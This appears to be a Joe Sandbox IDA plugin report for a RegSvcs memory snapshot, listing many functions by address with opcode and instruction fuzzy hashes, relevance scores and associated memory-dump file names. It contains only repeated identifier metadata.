Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32a10b0654842491c5be3e2d4a26b0b745fe3cf1859330724f76884bbdfd76c7
Instruction ID: 9df9060cfdd2aa749ffc8390552d250640b490d916bfaa5533caf95ab08ac616
Opcode Fuzzy Hash: 32a10b0654842491c5be3e2d4a26b0b745fe3cf1859330724f76884bbdfd76c7
Instruction Fuzzy Hash: 30C15870108381DFEB68CF19C484BAAB7E5BF88304F44496DE99987391D774EA48CF92

Function 0112C427 Relevance: .3, Instructions: 280COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cbe2a349d2b133ee8ac0e39298a8aa66043c06a4b5112b2d3c5a750000f5acfa
Instruction ID: 2c707d1bc15f9871a0f28d7d05ad5341d135dc27be4f7568d9ecf7cb575f9f31
Opcode Fuzzy Hash: cbe2a349d2b133ee8ac0e39298a8aa66043c06a4b5112b2d3c5a750000f5acfa
Instruction Fuzzy Hash: 71B15F70B002668BDB78DF58C890BADB7B5AF44704F0485EAD64AE7241EB70DD86CF61

Function 01170185 Relevance: .3, Instructions: 276COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35f87eb3fb93fde18b4e308ea3c20d416ec06e2c19308cd3a46161c077e124ed
Instruction ID: e93e26f5dd53c5c31b7b56637747dd4aa84940d38fce6ecaf7667a94348c7b10
Opcode Fuzzy Hash: 35f87eb3fb93fde18b4e308ea3c20d416ec06e2c19308cd3a46161c077e124ed
Instruction Fuzzy Hash: 7BA1B075B0071A9FDB2DDF69C890BAABBB1FF49318F104129EA0697381DB34A851CB50

Function 011B60E0 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe4bd4049e47d3802ef2ef92616d878125051c0799f5742d9d71c1b1283e2124
Instruction ID: b6009bee40bad42d514a54e67d325ffaa0e5df3c5586b836fd66ae6678950ff4
Opcode Fuzzy Hash: fe4bd4049e47d3802ef2ef92616d878125051c0799f5742d9d71c1b1283e2124
Instruction Fuzzy Hash: E491CF71E04216AFDB19CFA8D8D4BEEBFB5AF58710F154169EA14AB350D734E900CBA0

Function 0114E3F0 Relevance: .3, Instructions: 261COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38702590dafba5b524feb4268ee4358cfe588eb01fa5223f3f0b5aba519740a3
Instruction ID: c15ff707629188ba2370b3ae9545ab31f9de28854754c2b97ebdd5ca1a50d727
Opcode Fuzzy Hash: 38702590dafba5b524feb4268ee4358cfe588eb01fa5223f3f0b5aba519740a3
Instruction Fuzzy Hash: 36910336A0161ADBEB2CDB68C444BBD7BA1FF94B18F094069ED15DF240E738D941CB91

Function 011663FF Relevance: .3, Instructions: 261COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84f5b27c57397d46d051d5bc6cedd25ff241e3cc72d14c53fd79d120dfebb4ab
Instruction ID: 310863f024868b38ee874d56efc4124acae1708c0fc63d0be81aebc554500f8f
Opcode Fuzzy Hash: 84f5b27c57397d46d051d5bc6cedd25ff241e3cc72d14c53fd79d120dfebb4ab
Instruction Fuzzy Hash: 19914731B00315ABEB3DDF18E848BAE7FA5FF50B28F584129E9006BA85D7B59801C791

Function 01140C00 Relevance: .3, Instructions: 260COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14ee829c9ebb7db86e1e0c87a4bea7345a44b060a5607c26b6b687e324e087af
Instruction ID: 45eb99f04cd188ebcbbe6fd4898334351abb1cd7e4aa63ebf73a9f6ff9e25925
Opcode Fuzzy Hash: 14ee829c9ebb7db86e1e0c87a4bea7345a44b060a5607c26b6b687e324e087af
Instruction Fuzzy Hash: D4A10470604306DFDB2DCF29C4407BEBBE2AF48B04F14856DE69A9B642D730E944CB91

Function 011B89B3 Relevance: .3, Instructions: 259COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d776b0e4c9ef7218fff961035c8b6e2a42ae2dfa6f82cda886abb165e6e35da
Instruction ID: fd1421261e275faa116049dbbbebf5427049e4f2480b8ad5ce476bc397e8bdae
Opcode Fuzzy Hash: 2d776b0e4c9ef7218fff961035c8b6e2a42ae2dfa6f82cda886abb165e6e35da
Instruction Fuzzy Hash: 439133B2A45326BFD72EEF2898C0BEE77A8AB54F18F454559FA406B280C730DC01C795

Function 01164AD0 Relevance: .2, Instructions: 228COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c28092e7a34f098619c1569777f0fb58c99ffb1df58c26086d5b9feb4e338bce
Instruction ID: ba081328eb5c30bf66bafa1f1856c991cbad0436851a4e56d4f1c80f9b642c79
Opcode Fuzzy Hash: c28092e7a34f098619c1569777f0fb58c99ffb1df58c26086d5b9feb4e338bce
Instruction Fuzzy Hash: 3661133A610B129BD72ECF1CC881B2ABBE9FF90B50F55852DE8659B741C731E811CB91

Function 01186ACC Relevance: .2, Instructions: 226COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8481cca44e441517aca82e68c43c15d74d3bebd44f42ba4fc223d74649a0afd
Instruction ID: e8bce859f100c068fbfb4dc02f29d243a825fdd8677589a4232f4ccf34fd2a14
Opcode Fuzzy Hash: d8481cca44e441517aca82e68c43c15d74d3bebd44f42ba4fc223d74649a0afd
Instruction Fuzzy Hash: 1681A371E006169BDB2CDF69C850ABEBBF9FB48704F04852EE455E7640E334E940CBA4

Function 01126D10 Relevance: .2, Instructions: 216COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a400d77ad863de7d7a974616c0a65d729864aaea7c5c21ceea20b0c2b1faf537
Instruction ID: 78f484521717cf106d662410b212e53fa9d973f217bc7d5ee6d6072a47e1e0ae
Opcode Fuzzy Hash: a400d77ad863de7d7a974616c0a65d729864aaea7c5c21ceea20b0c2b1faf537
Instruction Fuzzy Hash: B071B07160471AABDB29EF19C880B7EBBE4BBC4258F01C929F955D7240E731E944CF92

Function 0116E284 Relevance: .2, Instructions: 212COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f99739ad36c9f94610e778bf559181c725cc92883b3e7f7b878c4d54262cce0
Instruction ID: d317ccb85cbd077f6866f9142f6ce9f9f3f60e77e80adcddce157099080a1d0f
Opcode Fuzzy Hash: 9f99739ad36c9f94610e778bf559181c725cc92883b3e7f7b878c4d54262cce0
Instruction Fuzzy Hash: 7E81AD75A01609EFDB29CFA8C880BEEBBFAFF88344F104529E555A7250D731AC55CB60

Function 011364AB Relevance: .2, Instructions: 211COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1cc5f6ae9eb730cc4b1453db252302528840231a55740556a4cd09379bb42bc
Instruction ID: 57831ea33ad64edd2e2bb73d1bbcc5022976fe37a51ce5724e2943af40a4bcaa
Opcode Fuzzy Hash: d1cc5f6ae9eb730cc4b1453db252302528840231a55740556a4cd09379bb42bc
Instruction Fuzzy Hash: 6071C371904305AFCB29DF18C884B977FA8EF957A4F404468F9488B28AD735D689CFD2

Function 0114C640 Relevance: .2, Instructions: 206COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a58db77d036177f5a60ae05e618fa6ef0ddff3447f325e8e9167956eda91958
Instruction ID: 1a3d15b3ce24fd6ee6c536af8de2776ab9209a1bb5bda0da00e77a8001b54373
Opcode Fuzzy Hash: 6a58db77d036177f5a60ae05e618fa6ef0ddff3447f325e8e9167956eda91958
Instruction Fuzzy Hash: F971AB75D05669ABCB29CF58D8907FEBBB1FF59B10F15411AE952AB350E730A800CBA0

Function 0116A660 Relevance: .2, Instructions: 200COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e375176086f2858ed30a825a30b161c9d8cd31b895de2012a49f92fad27e1301
Instruction ID: 70a7f55d65d2c546980273b4faaa56a6f32c0f287bfdf93340ec2164d0026e99
Opcode Fuzzy Hash: e375176086f2858ed30a825a30b161c9d8cd31b895de2012a49f92fad27e1301
Instruction Fuzzy Hash: 49717BB9E0031ADFDF2CCF98D590AADBFB2BF48704F58812AE905A7245E7318941CB50

Function 011B035C Relevance: .2, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2f0af9a4cc35be43268488dd58ae78b3cd43133769d1ae5baa3c223ab0f1c10
Instruction ID: f772f09861cb8dd5f88f095078774b2c9333463e716109ab0e2475c3b2c0a069
Opcode Fuzzy Hash: a2f0af9a4cc35be43268488dd58ae78b3cd43133769d1ae5baa3c223ab0f1c10
Instruction Fuzzy Hash: C6718B71E0061AAFCB19DFA9C984EEEBBB8FF48704F104569E505A7250DB34EA41CB90

Function 01138AA0 Relevance: .2, Instructions: 197COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53747d3b516b7da247b933cd9f659fd34807d6d4c33bd8bd1643b44ffeb62200
Instruction ID: 8ee64b4c48805b90ba539587c0a5820837fcd5a1430a2900773af9bfd9212d5d
Opcode Fuzzy Hash: 53747d3b516b7da247b933cd9f659fd34807d6d4c33bd8bd1643b44ffeb62200
Instruction Fuzzy Hash: 9C81D372A08346DFDF2CDF98D488B6DBBB1BF88314F164269E9106B289C7749D41CB90

Function 0113A471 Relevance: .2, Instructions: 194COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00d1a92d03587ac8e0dd210f968475631dd9158d5e8e3c7a34fa2b7e3135dd3a
Instruction ID: 375873bed0c72e8a2f178952376cf31976e70edc8d077d20d7e67d55dad24ae4
Opcode Fuzzy Hash: 00d1a92d03587ac8e0dd210f968475631dd9158d5e8e3c7a34fa2b7e3135dd3a
Instruction Fuzzy Hash: 31716E75108386DBDB19CF58D040BAAB7E4EFC4704F048829FAD5D7258E735DA4ACB52

Function 01140A5B Relevance: .2, Instructions: 190COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85e6ec674a01bb6e528b55365080061e2774d8ac2b77bb9e83d868633818ff7c
Instruction ID: bc16d43881af6e79bdcd42c2cadb94b4ce5d35d757d199b383429802620025dc
Opcode Fuzzy Hash: 85e6ec674a01bb6e528b55365080061e2774d8ac2b77bb9e83d868633818ff7c
Instruction Fuzzy Hash: F161CF74604301DFDB2DCF29C440BAABBE2FF49B08F14855EE5598B292D770E981CB95

Function 0112CF50 Relevance: .2, Instructions: 190COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5db7ced273f109870a3119fbeff8411b08063341be5324f50c129b50302a2ba0
Instruction ID: 02f7c5a71abcd2a4c583af4ea3b32a773a0746cefe26be4d173fba7c8b550d47
Opcode Fuzzy Hash: 5db7ced273f109870a3119fbeff8411b08063341be5324f50c129b50302a2ba0
Instruction Fuzzy Hash: 9071AE71510B528BD73E6E29D540B22BBE0BF907A5F204B1EDAE2069E1D334A452CF85

Function 011461D1 Relevance: .2, Instructions: 186COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

